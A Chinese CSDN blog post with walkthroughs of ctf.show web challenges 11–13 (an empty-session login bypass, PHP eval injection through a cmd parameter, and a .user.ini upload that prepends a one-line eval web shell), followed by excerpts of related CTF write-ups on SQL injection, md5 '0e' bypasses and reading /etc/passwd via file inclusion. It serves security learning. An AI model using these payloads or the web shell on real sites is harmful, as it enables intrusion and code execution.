ctf.show_web

最新推荐文章于 2024-05-03 02:11:27 发布
最新推荐文章于 2024-05-03 02:11:27 发布
阅读量651 收藏 19
点赞数 19
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangzhemvp/article/details/137149514
版权

11.ctf.show_web11

解题步骤

密码为空,用 bp 抓包,去掉 session。

$password==$_SESSION['password']:输入的password和session的结果一致

后端代码就是拿这个session的value值与我们输入的密码进行匹配, 由于这个value值我没解密出来, 所以这里干脆一点, 直接删除让变成空, 密码什么也不输, 也会是空, 空=空, 从而登录成功。

不是把它全部去掉。 

 知识点

session是另一种记录客户状态的机制,不同的是Cookie保存在客户端浏览器中,而Session保存在服务器上。客户端浏览器访问服务器的时候,服务器把客户端信息以某种形式记录在服务器上。这就是Session。客户端浏览器再次访问时只需要从该Session中查找该客户的状态就可以了。

cookie和session的详解与区别 - 测试开发喵 - 博客园 (cnblogs.com)

12.ctf.show_web12

(1)看到 cmd,想到命令,eval()

(2)本题可以写入命令

解题步骤

1.看源码,发现 ?cmd= ;

2.输入?cmd=phpinfo();有回显;

注:eval 里面要写 ;

3.?cmd=highlight_file("index.php");

 注:要打双引号。

4.输入?cmd=print_r(glob("*")); 

 5.?cmd=highlight_file("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a

732f56f.php");

知识点 

glob() :返回匹配指定的文件名或目录。

比如:glob("*") 匹配任意文件;                glob("*.txt")匹配以txt为后缀的文件

可以使用命令,就可以用glob,比如,一句话木马

3.ctf.show_web13 

解题步骤

1.先上传.user.ini,内容为

auto_prepend_file=a.txt

2.然后上传a.txt,这样的话,每次调用 php 文件,都会自动包含 a.txt 文件,题目中要求文件的内容不能太长,会引起报错

<?php eval($_GET['w']);

.user.ini :实际上就是一个可以由用户“自定义”的php.ini

在执行php代码是,先会扫.ini文件

auto_append_file指定一个文件,自动包含在要执行的文件前。就是先执行

shiyispoder
关注
ctf.show_web2解题过程
qq_38634097的博客
05-24 590
打开场景看到的是登录框,输入弱口令admin/admin、admin/123456等无结果。我们已知,mysql5.0以上版本有infomation_schema,所以此处可以利用内置的数据库查询。得到flag:ctfshow{4db0befe-fc42-4b6f-8faf-f4b81f94fb82}构造poc:1’ or 1=1 # 进行登录,得到以下结果。1’ or 1=1 order by 4 # 登录失败。1’ or 1=1 order by 3 # 登录成功。得到第一列为flqg,
ctf.show web 8 sql注入过滤了‘
m0_46412682的博客
07-14 1001
ctf.show web 8 sql注入过滤了’ 开始的页面 提示是sql注入,第一步先试下 ’ or 1=1# 提示sql注入错误 第二步试下/**/替代空格,还是错误 第三步,去掉’单引号,成功,说明过滤了单引号 查看有多少字段,1/**/or/**/1=1/**/union/**/select/**/1,2,3#,但是这里又提示sql错误,这里可能过滤了select和union关键字 上脚本,这的脚本是网上找的 import requests s=requests.session() url='h
ctf.show web入门(信息搜集) 1~20
qq_61768489的博客
01-15 1516
目录 web1 web2 web3 web4 web5 web6 web7 web8 web9 web10 web11 web12 web13 web14 web15 web16 web17 web18 web19 web20 web1 右击查看源代码即可 web2 他告诉说无法查看源代码,确实右击 F12没反应, 但是我们直接Ctrl+u 就可以看了 或者 hint给了一个方式 :通过在url头部添加 view-sourc...
2024年最新ctf-show WEB板块(持续更新)
最新发布
2401_84266286的博客
05-03 966
看flag表里面有哪些字段: 有 flag这个字段查看flag表里面flag字段里面的数据: 得到flag。
CTFctfshow——web
m0_52923241的博客
09-19 2733
ctfshow之web通关web签到题(so easy)web2:SQL注入漏洞(联合查询)web3:文件包含漏洞web4:文件包含漏洞(日志注入)web5:md5绕过web6:SQL注入漏洞(空格被过滤)web7:SQL注入漏洞(盲注&sqlmap)布尔盲注sqlmapweb8:SQL注入漏洞(布尔盲注)web9:robots.txt + SQL注入 + md5web10web11:web12 web签到题(so easy) base64解码点这里 F12,看到有一串字符串,base64解码
CTF show WEB5
羽的博客
02-15 2832
考察md5绕过,要求v1为为字母,v2为数字,并且v1与v2的md5值相同。 md5漏洞介绍: PHP在处理哈希字符串时,它把每一个以“0E”开头的哈希值都解释为0 所以只要v1与v2的md5值以0E开头即可。 v1=QNKCDZO&v2=240610708 这里附上常见的0E开头的MD5 0e开头的md5和原值: QNKCDZO 0e830400451993494058024219903...
CTF show WEB14
羽的博客
02-18 2831
题目地址:https://ctf.show 对于这个题第一个坑要过的话必须得了解php的switch case语句。 在这里举个例子: $number=1; switch ($number) { case "1": echo "one"; case "2": echo "two"; case "3" echo "three"...
ctf.show_web5
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个...
ctf.show_web9
10-21
ctf.show_web9是一个CTF比赛中的一个web安全题目,考察的是命令执行漏洞的利用方式。这一关需要使用PHP的命令执行函数执行系统命令,读取网站根目录下的配置文件,获取flag。具体来说,需要通过构造payload,将命令...
ctf.show_web6
10-21
ctf.show_web6是一个WEB模块,其中存在一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格。我们可以使用括号()或者注释/**/绕过。如果成功注入,可以获取到flag。同时,在密码框中输入空格也会多一个黑点...
CTFshow [web1-5]
weixin_45253622的博客
05-09 377
web3 打开题目我们发现下列,看起来像是,文件包含,url是参数。 我们试试file协议: http://67a60ab5-5ad4-4e2f-834e-a6ace7f2bad2.challenge.ctf.show:8080/?url=file:///etc/passwd 出结果了,可以看出本题是php伪协议+文件包含+命令执行的题目。 我们输入 http://67a60ab5-5ad4-4e2f-834e-a6ace7f2bad2.challenge.ctf.show:8080
ctf.show web web1-web10
qq_61993117的博客
09-17 1941
记录一些web的知识点,本人刚开始学习web很多资料都是借鉴大佬的,许多复现的过程都是大同小异的,写的菜了请大佬们下手轻点。
ctf.show_web(1-14)wp
qq_73767109的博客
03-28 846
ctf.show_web(1-14) 详细解题思路及部分脚本
ctfshow web入门58-77(命令执行 bypass禁用函数和访问目录)
Firebasky的博客
09-18 1867
1. web58-65 payload:c=show_source('flag.php'); 2. web66 1.查看flag文件 c=print_r(scandir("/")); c=highlight_file('/flag.txt'); 3. web67 盲猜 c=highlight_file('/flag.txt'); 4. web68-70 尝试include('index.php'); 发现字节太大了 直接盲猜c=include('/flag.txt'); 5. web71 <?php
ctf-show WEB板块(持续更新)
wobushilijiatu的博客
12-14 314
使用 php://input:可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行,当传入的参数作为文件名打开时,可以将参数设为php://input,同时post写入想要执行的php代码,php执行时会将post内容当作文件内容,从而导致任意代码执行。发现 include 函数 想到 文件包含 GET方式 传入一个url尝试 文件包含 肯定是需要 伪协议了。先试试万能密码 能登录 进去 存在sql注入漏洞。得到了一个文件在 看这个文件 得到flag。发现flag 获取列名。
CTF show web入门 信息搜寻
qq_52429415的博客
03-03 1076
CTF show web入门 信息搜寻 目录web1web2web3web4web5web6web7web8web9web10web11web12web13web14web15web16web17web18web19web19 web1 进入后按F12看源代码 web2 进入网址,发现不能按F12,按ctrl+U查看源代码 web3 发现提示(没思路的时候抓个包看看) 根据提示进行抓包 web4 在题目中发现提示(后台地址写入robots) 访问robots输入robots.txt 访问flagi
ctf-show WEB板块(持续更新),2024年最新网络安全自定义View详解
2401_83974370的博客
04-13 514
](https://img-blog.csdnimg.cn/direct/deed950008e444038737d4daf6e2fe2e.png) 只能改其他文件格式 使用 .htaccess或者.user.ini 去解析为php文件去执行。上传成功 提示后缀名错误 我们改为 phtml ,php3 都不行。echo "登陆成功。
ctfshow-Web入门-1~10wp
yutianovo的博客
09-03 1303
Web1 右键 查看源码得到flag Web2 使用查看源码的快捷键 Ctrl+U 或者 view-source:http://网站/ Web3 响应头获取flag Web4 访问 robots.txt 得到 flag详细目录 访问即可获得flag Web5 访问 index.phps 得到源码,就能看到flag Web6 访问 www.zip 得到压缩包 看到注释 flag in fl000g.txt 压缩包中是没有flag的 在网页中访问 fl000g.txt 就能得到 Web7 访问 .g.
ctf.show命令执行(web29-web124)
wanan的博客
08-31 6326
ctf.show命令执行(web29-web124)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值